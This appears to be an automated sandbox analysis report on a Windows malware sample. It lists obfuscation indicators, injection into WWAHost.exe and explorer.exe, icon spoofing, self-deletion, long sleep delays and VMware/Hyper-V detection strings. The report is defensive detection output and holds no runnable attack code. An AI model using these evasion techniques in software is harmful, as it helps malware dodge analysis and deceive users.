          Source: Binary string: wntdll.pdbUGP source: P5348574_74676.exe, 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, P5348574_74676.exe, 00000002.00000003.550716318.0000000001459000.00000004.00000020.00020000.00000000.sdmp, P5348574_74676.exe, 00000002.00000003.552036455.00000000015F1000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.815352919.0000000003FB0000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.815352919.00000000040CF000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.582987666.0000000003E15000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.578620427.0000000003C78000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cqdO.pdb source: P5348574_74676.exe
          Source: Binary string: wntdll.pdb source: P5348574_74676.exe, P5348574_74676.exe, 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, P5348574_74676.exe, 00000002.00000003.550716318.0000000001459000.00000004.00000020.00020000.00000000.sdmp, P5348574_74676.exe, 00000002.00000003.552036455.00000000015F1000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.815352919.0000000003FB0000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.815352919.00000000040CF000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.582987666.0000000003E15000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.578620427.0000000003C78000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: eex.pdb source: explorer.exe, 00000003.00000002.833142897.00007FF883751000.00000020.00000001.01000000.0000000A.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: P5348574_74676.exe, OPN1LW_v1._1/Form1.cs.Net Code: InitializeComponent
          Source: 1.0.P5348574_74676.exe.640000.0.unpack, OPN1LW_v1._1/Form1.cs.Net Code: InitializeComponent
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 1_2_02A0FA82 pushfd ; iretd 1_2_02A0FA49
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 1_2_02A0FA42 pushfd ; iretd 1_2_02A0FA49
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0041085A push ds; ret 2_2_0041085B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0041A8A6 push edi; retf 2_2_0041A8AC
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0041B316 push edx; iretd 2_2_0041B320
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0041BCF6 push ss; iretd 2_2_0041BCFE
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0041B482 pushad ; retf 2_2_0041B48C
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0041AD04 push esi; iretd 2_2_0041AD0A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_00422DFE push ebp; retf 0000h2_2_00422E06
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_00401DB0 push eax; ret 2_2_00401DB2
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_00405EEF push ds; ret 2_2_00405EFF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_00410756 pushad ; retf 2_2_00410757
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_004117F6 push ss; ret 2_2_004117FE
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0180D0D1 push ecx; ret 2_2_0180D0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.525881009059905

          Hooking and other Techniques for Hiding and Protection

          barindex
          Icon mismatch, binary includes an icon from a different legit application in order to fool users
          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (58).png
          Deletes itself after installation
          Source: C:\Windows\SysWOW64\WWAHost.exeFile deleted: c:\users\user\desktop\p5348574_74676.exeJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exe TID: 6904Thread sleep time: -41202s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exe TID: 6876Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6940Thread sleep time: -52000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01885BA5 rdtsc 2_2_01885BA5
          Source: C:\Users\user\Desktop\P5348574_74676.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 864Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880Jump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeAPI coverage: 7.6 %
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeThread delayed: delay time: 41202Jump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000003.00000003.673642852.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
          Source: explorer.exe, 00000003.00000003.805284481.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000002.821201756.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
          Source: explorer.exe, 00000003.00000003.805284481.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000003.675057582.000000000D00E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806407016.000000000D00E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.674532168.000000000D001000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.827006439.000000000D011000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.671967919.000000000CFD9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWalSt%SystemRoot%\system32\mswsock.dll1
          Source: explorer.exe, 00000003.00000003.674582723.000000000CDE5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000003.00000003.675487608.00000000083E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.673642852.00000000083E9000.00000004.00000001.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.820630497.0000000008380000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: WWAHost.exe, 00000004.00000002.813585736.000000000369A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
          Source: explorer.exe, 00000003.00000003.805284481.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01885BA5 rdtsc 2_2_01885BA5
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BB171 mov eax, dword ptr fs:[00000030h]2_2_017BB171
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BB171 mov eax, dword ptr fs:[00000030h]2_2_017BB171
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BC962 mov eax, dword ptr fs:[00000030h]2_2_017BC962
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018749A4 mov eax, dword ptr fs:[00000030h]2_2_018749A4
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018749A4 mov eax, dword ptr fs:[00000030h]2_2_018749A4
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018749A4 mov eax, dword ptr fs:[00000030h]2_2_018749A4
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018749A4 mov eax, dword ptr fs:[00000030h]2_2_018749A4
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018369A6 mov eax, dword ptr fs:[00000030h]2_2_018369A6
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DB944 mov eax, dword ptr fs:[00000030h]2_2_017DB944
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DB944 mov eax, dword ptr fs:[00000030h]2_2_017DB944
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018351BE mov eax, dword ptr fs:[00000030h]2_2_018351BE
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018351BE mov eax, dword ptr fs:[00000030h]2_2_018351BE
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018351BE mov eax, dword ptr fs:[00000030h]2_2_018351BE
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018351BE mov eax, dword ptr fs:[00000030h]2_2_018351BE
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E513A mov eax, dword ptr fs:[00000030h]2_2_017E513A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E513A mov eax, dword ptr fs:[00000030h]2_2_017E513A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D4120 mov eax, dword ptr fs:[00000030h]2_2_017D4120
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D4120 mov eax, dword ptr fs:[00000030h]2_2_017D4120
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D4120 mov eax, dword ptr fs:[00000030h]2_2_017D4120
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D4120 mov eax, dword ptr fs:[00000030h]2_2_017D4120
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D4120 mov ecx, dword ptr fs:[00000030h]2_2_017D4120
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018441E8 mov eax, dword ptr fs:[00000030h]2_2_018441E8
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B9100 mov eax, dword ptr fs:[00000030h]2_2_017B9100
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B9100 mov eax, dword ptr fs:[00000030h]2_2_017B9100
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B9100 mov eax, dword ptr fs:[00000030h]2_2_017B9100
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BB1E1 mov eax, dword ptr fs:[00000030h]2_2_017BB1E1
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BB1E1 mov eax, dword ptr fs:[00000030h]2_2_017BB1E1
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BB1E1 mov eax, dword ptr fs:[00000030h]2_2_017BB1E1
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D99BF mov ecx, dword ptr fs:[00000030h]2_2_017D99BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D99BF mov ecx, dword ptr fs:[00000030h]2_2_017D99BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D99BF mov eax, dword ptr fs:[00000030h]2_2_017D99BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D99BF mov ecx, dword ptr fs:[00000030h]2_2_017D99BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D99BF mov ecx, dword ptr fs:[00000030h]2_2_017D99BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D99BF mov eax, dword ptr fs:[00000030h]2_2_017D99BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D99BF mov ecx, dword ptr fs:[00000030h]2_2_017D99BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D99BF mov ecx, dword ptr fs:[00000030h]2_2_017D99BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D99BF mov eax, dword ptr fs:[00000030h]2_2_017D99BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D99BF mov ecx, dword ptr fs:[00000030h]2_2_017D99BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D99BF mov ecx, dword ptr fs:[00000030h]2_2_017D99BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D99BF mov eax, dword ptr fs:[00000030h]2_2_017D99BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E61A0 mov eax, dword ptr fs:[00000030h]2_2_017E61A0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E61A0 mov eax, dword ptr fs:[00000030h]2_2_017E61A0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E2990 mov eax, dword ptr fs:[00000030h]2_2_017E2990
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EA185 mov eax, dword ptr fs:[00000030h]2_2_017EA185
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DC182 mov eax, dword ptr fs:[00000030h]2_2_017DC182
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01833884 mov eax, dword ptr fs:[00000030h]2_2_01833884
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01833884 mov eax, dword ptr fs:[00000030h]2_2_01833884
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D0050 mov eax, dword ptr fs:[00000030h]2_2_017D0050
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D0050 mov eax, dword ptr fs:[00000030h]2_2_017D0050
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA830 mov eax, dword ptr fs:[00000030h]2_2_017DA830
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA830 mov eax, dword ptr fs:[00000030h]2_2_017DA830
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA830 mov eax, dword ptr fs:[00000030h]2_2_017DA830
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA830 mov eax, dword ptr fs:[00000030h]2_2_017DA830
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E002D mov eax, dword ptr fs:[00000030h]2_2_017E002D
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E002D mov eax, dword ptr fs:[00000030h]2_2_017E002D
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E002D mov eax, dword ptr fs:[00000030h]2_2_017E002D
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E002D mov eax, dword ptr fs:[00000030h]2_2_017E002D
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E002D mov eax, dword ptr fs:[00000030h]2_2_017E002D
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0184B8D0 mov eax, dword ptr fs:[00000030h]2_2_0184B8D0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0184B8D0 mov ecx, dword ptr fs:[00000030h]2_2_0184B8D0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0184B8D0 mov eax, dword ptr fs:[00000030h]2_2_0184B8D0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0184B8D0 mov eax, dword ptr fs:[00000030h]2_2_0184B8D0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0184B8D0 mov eax, dword ptr fs:[00000030h]2_2_0184B8D0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0184B8D0 mov eax, dword ptr fs:[00000030h]2_2_0184B8D0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017CB02A mov eax, dword ptr fs:[00000030h]2_2_017CB02A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017CB02A mov eax, dword ptr fs:[00000030h]2_2_017CB02A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017CB02A mov eax, dword ptr fs:[00000030h]2_2_017CB02A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017CB02A mov eax, dword ptr fs:[00000030h]2_2_017CB02A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01837016 mov eax, dword ptr fs:[00000030h]2_2_01837016
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01837016 mov eax, dword ptr fs:[00000030h]2_2_01837016
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01837016 mov eax, dword ptr fs:[00000030h]2_2_01837016
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B58EC mov eax, dword ptr fs:[00000030h]2_2_017B58EC
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DB8E4 mov eax, dword ptr fs:[00000030h]2_2_017DB8E4
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DB8E4 mov eax, dword ptr fs:[00000030h]2_2_017DB8E4
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B40E1 mov eax, dword ptr fs:[00000030h]2_2_017B40E1
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B40E1 mov eax, dword ptr fs:[00000030h]2_2_017B40E1
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B40E1 mov eax, dword ptr fs:[00000030h]2_2_017B40E1
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01884015 mov eax, dword ptr fs:[00000030h]2_2_01884015
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01884015 mov eax, dword ptr fs:[00000030h]2_2_01884015
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EF0BF mov ecx, dword ptr fs:[00000030h]2_2_017EF0BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EF0BF mov eax, dword ptr fs:[00000030h]2_2_017EF0BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EF0BF mov eax, dword ptr fs:[00000030h]2_2_017EF0BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F90AF mov eax, dword ptr fs:[00000030h]2_2_017F90AF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E20A0 mov eax, dword ptr fs:[00000030h]2_2_017E20A0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E20A0 mov eax, dword ptr fs:[00000030h]2_2_017E20A0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E20A0 mov eax, dword ptr fs:[00000030h]2_2_017E20A0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E20A0 mov eax, dword ptr fs:[00000030h]2_2_017E20A0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E20A0 mov eax, dword ptr fs:[00000030h]2_2_017E20A0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E20A0 mov eax, dword ptr fs:[00000030h]2_2_017E20A0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01872073 mov eax, dword ptr fs:[00000030h]2_2_01872073
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B9080 mov eax, dword ptr fs:[00000030h]2_2_017B9080
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01881074 mov eax, dword ptr fs:[00000030h]2_2_01881074
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E3B7A mov eax, dword ptr fs:[00000030h]2_2_017E3B7A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E3B7A mov eax, dword ptr fs:[00000030h]2_2_017E3B7A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0186D380 mov ecx, dword ptr fs:[00000030h]2_2_0186D380
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0187138A mov eax, dword ptr fs:[00000030h]2_2_0187138A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BDB60 mov ecx, dword ptr fs:[00000030h]2_2_017BDB60
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BF358 mov eax, dword ptr fs:[00000030h]2_2_017BF358
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01885BA5 mov eax, dword ptr fs:[00000030h]2_2_01885BA5
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BDB40 mov eax, dword ptr fs:[00000030h]2_2_017BDB40
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018353CA mov eax, dword ptr fs:[00000030h]2_2_018353CA
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018353CA mov eax, dword ptr fs:[00000030h]2_2_018353CA
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA309 mov eax, dword ptr fs:[00000030h]2_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DDBE9 mov eax, dword ptr fs:[00000030h]2_2_017DDBE9
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0187131B mov eax, dword ptr fs:[00000030h]2_2_0187131B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E03E2 mov eax, dword ptr fs:[00000030h]2_2_017E03E2
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E03E2 mov eax, dword ptr fs:[00000030h]2_2_017E03E2
